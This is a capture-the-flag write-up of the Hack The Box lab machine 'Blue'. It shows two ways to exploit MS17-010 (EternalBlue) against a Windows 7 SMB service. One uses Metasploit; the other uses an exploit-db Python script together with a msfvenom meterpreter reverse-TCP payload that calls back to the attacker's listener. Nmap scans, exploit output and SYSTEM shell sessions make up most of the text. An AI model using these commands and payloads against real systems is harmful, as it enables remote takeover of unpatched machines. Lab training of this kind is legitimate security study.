Blue is very simple box that is vulnerable to MS17-010. I will show how to exploit this using metasploit and then a second way by generating our own payload using msfvenom combined with a python script.
Using Metasploit
Start with an nmap scan
# Nmap 7.80 scan initiated Mon Oct 21 23:09:48 2019 as: nmap -sV -sC -T4 10.10.10.40
Nmap scan report for 10.10.10.40
Host is up (0.059s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -4h18m55s, deviation: 34m36s, median: -3h58m56s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2019-10-22T00:11:58+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-10-21T23:11:59
|_ start_date: 2019-10-21T09:24:16
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Oct 21 23:11:00 2019 -- 1 IP address (1 host up) scanned in 72.43 seconds
So a few ports open, most of them useless but SMB is open. We can verify it is vulnerable to eternal blue by using nmap.
# nmap --script vuln -p 445 10.10.10.40
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-22 00:26 EDT
PORT STATE SERVICE
445/tcp open microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
Now if we start metasploit and load the exploit we can enter show options
and see that the only information that we really have to enter is the RHOST
.
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
I set the RHOST
to the IP of the box and then hit exploit and am given a shell. If I run whoami
It shows I am the NT AUTHORITY/SYSTEM
.
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.10.10.40
rhosts => 10.10.10.40
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 10.10.14.39:4444
[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (10.10.14.39:4444 -> 10.10.10.40:49160) at 2019-10-22 00:34:30 -0400
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
C:\Windows\system32>whoami
whoami
nt authority\system
Manual Walkthrough
Using searchsploit
we can see the python script that we will be using. We want the second one.
# searchsploit "Eternal Blue"
--------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------------------------- ----------------------------------------
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Ex | exploits/windows/remote/42031.py
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue | exploits/windows/remote/42315.py
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remo | exploits/windows_x86-64/remote/42030.py
--------------------------------------------------------------- ----------------------------------------
You can copy it to your current working directory by using the -m option
# searchsploit -m exploits/windows/remote/42315.py
Now there are a couple steps we have to do before we can actually execute the exploit. First we have to generate our payload.
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.39 LPORT=9999 -f exe > blue.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
Next we need to edit the python script. First edit the username variable so it contains two //
. This is because the SMB server allows guest login
USERNAME = '//'
PASSWORD = ''
Lastly, uncomment two lines and edit them to point to the payload that you created.
def smb_pwn(conn, arch):
smbConn = conn.get_smbconnection()
print('creating file c:\\pwned.txt on the target')
tid2 = smbConn.connectTree('C$')
fid2 = smbConn.createFile(tid2, '/pwned.txt')
smbConn.closeFile(tid2, fid2)
smbConn.disconnectTree(tid2)
----> smb_send_file(smbConn, '/root/Documents/HTB2/Blue/blue.exe', 'C', '/blue.exe')
----> service_exec(conn, r'cmd /c c:\\blue.exe')
# Note: there are many methods to get shell over SMB admin session
# a simple method to get shell (but easily to be detected by AV) is
# executing binary generated by "msfvenom -f exe-service ..."
Now we need to set up our listener. For this we will use Metasploits multi/handler
. Set the LHOST and LPORT to your IP and port you chose when generating your payload and then set the apayload for a windows reverse shell. Type exploit to start the handler.
msf5 exploit(multi/handler) > set lhost 10.10.14.39
lhost => 10.10.14.39
msf5 exploit(multi/handler) > set lport 9999
lport => 9999
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.14.39:9999
Now lets execute the python script
# python eternalBlue.py 10.10.10.40 ntsvcs
Target OS: Windows 7 Professional 7601 Service Pack 1
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
No transaction struct in leak data
leak failed... try again
No transaction struct in leak data
leak failed... try again
CONNECTION: 0xfffffa800405f020
SESSION: 0xfffff8a008df08e0
FLINK: 0xfffff8a000915048
InParam: 0xfffff8a00284b15c
MID: 0x4603
unexpected alignment, diff: 0x-1f36fb8
leak failed... try again
CONNECTION: 0xfffffa800405f020
SESSION: 0xfffff8a008df08e0
FLINK: 0xfffff8a0026dd048
InParam: 0xfffff8a00285715c
MID: 0x4607
unexpected alignment, diff: 0x-17afb8
leak failed... try again
CONNECTION: 0xfffffa800405f020
SESSION: 0xfffff8a008df08e0
FLINK: 0xfffff8a002883088
InParam: 0xfffff8a00287d15c
MID: 0x4703
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
creating file c:\pwned.txt on the target
Opening SVCManager on 10.10.10.40.....
Creating service OuBS.....
Starting service OuBS.....
The NETBIOS connection with the remote host timed out.
Removing service OuBS.....
ServiceExec Error on: 10.10.10.40
nca_s_proto_error
Done
If we go back to the reverse handler we see a meterpreter session has opened
[*] Sending stage (180291 bytes) to 10.10.10.40
[*] Meterpreter session 1 opened (10.10.14.39:9999 -> 10.10.10.40:49161) at 2019-10-22 01:01:24 -0400
meterpreter >
From here we can use the shell
command to give us a windows shell. We can run whoami
to show that we are indeed NT AUTHORITY/SYSTEM
.From here we can grab both the user and root flag.
The user.txt
flag is located in C:\Users\haris\Desktop\user.txt
.
C:\Users\haris\Desktop>type user.txt
type user.txt
4c546aea7dbee75c****************
The root.txt
flag is located in C:\Users\Administrator\Desktop\root.txt
.
C:\Users\Administrator\Desktop>type root.txt
type root.txt
ff548eb71e920ff6****************